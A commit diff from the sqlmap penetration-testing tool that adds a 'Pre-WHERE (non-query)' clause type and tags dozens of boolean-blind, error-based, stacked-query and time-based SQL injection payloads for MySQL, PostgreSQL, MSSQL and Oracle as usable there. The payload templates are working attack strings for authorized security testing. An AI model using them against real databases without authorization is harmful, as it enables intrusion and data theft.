sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Update for pre-WHERE payloads

Browse Source
This commit is contained in:
Miroslav Stampar 2016-04-08 13:19:42 +02:00
parent 674d516f3e
commit 38fcc5a35a
6 changed files with 171 additions and 171 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/settings.py
View File

@ -20,7 +20,7 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.4.9"
VERSION = "1.0.4.10"
REVISION = getRevisionNumber()
STABLE = VERSION.count('.') <= 2
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")

87
xml/boundaries.xml
View File

@ -31,6 +31,7 @@ Tag: <boundary>
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible.
@ -422,7 +423,7 @@ Formats:
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
@ -431,7 +432,7 @@ Formats:
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
@ -440,7 +441,7 @@ Formats:
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
@ -449,7 +450,7 @@ Formats:
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
@ -458,7 +459,7 @@ Formats:
<boundary>
<level>5</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
@ -467,12 +468,48 @@ Formats:
<boundary>
<level>4</level>
<clause>1</clause>
<clause>9</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>[GENERIC_SQL_COMMENT]</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<!-- End of pre-WHERE generic boundaries -->
<!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
@ -549,44 +586,6 @@ Formats:
</boundary>
<!-- End of pre-WHERE derived table boundaries -->
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<!-- End of INSERT/UPDATE generic boundaries -->
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
<boundary>
<level>4</level>

7
xml/payloads/01_boolean_blind.xml
View File

@ -53,6 +53,7 @@ Tag: <test>
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)
A comma separated list of these values is also possible.
@ -159,7 +160,7 @@ Tag: <test>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
@ -175,7 +176,7 @@ Tag: <test>
<stype>1</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [INFERENCE]</vector>
<request>
@ -191,7 +192,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR NOT [INFERENCE]</vector>
<request>

72
xml/payloads/02_error_based.xml
View File

@ -7,7 +7,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request>
@ -31,7 +31,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
@ -56,7 +56,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request>
@ -80,7 +80,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
@ -105,7 +105,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request>
@ -129,7 +129,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where>
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
@ -154,7 +154,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@ -174,7 +174,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@ -194,7 +194,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@ -219,7 +219,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@ -243,7 +243,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request>
@ -268,7 +268,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request>
@ -293,7 +293,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
<request>
@ -313,7 +313,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@ -332,7 +332,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@ -351,7 +351,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@ -372,7 +372,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@ -393,7 +393,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@ -414,7 +414,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
@ -435,7 +435,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
@ -454,7 +454,7 @@
<stype>2</stype>
<level>1</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request>
@ -473,7 +473,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -493,7 +493,7 @@
<stype>2</stype>
<level>2</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -513,7 +513,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -532,7 +532,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -551,7 +551,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -570,7 +570,7 @@
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -589,7 +589,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -608,7 +608,7 @@
<stype>2</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>2</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@ -655,7 +655,7 @@
<stype>2</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request>
@ -679,7 +679,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
<request>
@ -703,7 +703,7 @@
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
<request>
@ -727,7 +727,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request>
@ -747,7 +747,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request>
@ -771,7 +771,7 @@
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>
@ -790,7 +790,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request>

8
xml/payloads/04_stacked_queries.xml
View File

@ -450,7 +450,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@ -470,7 +470,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@ -571,7 +571,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@ -591,7 +591,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>

166
xml/payloads/05_time_blind.xml
View File

@ -7,7 +7,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -27,7 +27,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -47,7 +47,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -68,7 +68,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -89,7 +89,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -109,7 +109,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -129,7 +129,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -150,7 +150,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -171,7 +171,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -191,7 +191,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -211,7 +211,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -232,7 +232,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -253,7 +253,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -273,7 +273,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -294,7 +294,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request>
@ -314,7 +314,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request>
@ -335,7 +335,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@ -355,7 +355,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@ -374,7 +374,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@ -394,7 +394,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@ -414,7 +414,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -434,7 +434,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -454,7 +454,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -475,7 +475,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -496,7 +496,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -515,7 +515,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -534,7 +534,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -554,7 +554,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -617,7 +617,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@ -638,7 +638,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@ -659,7 +659,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
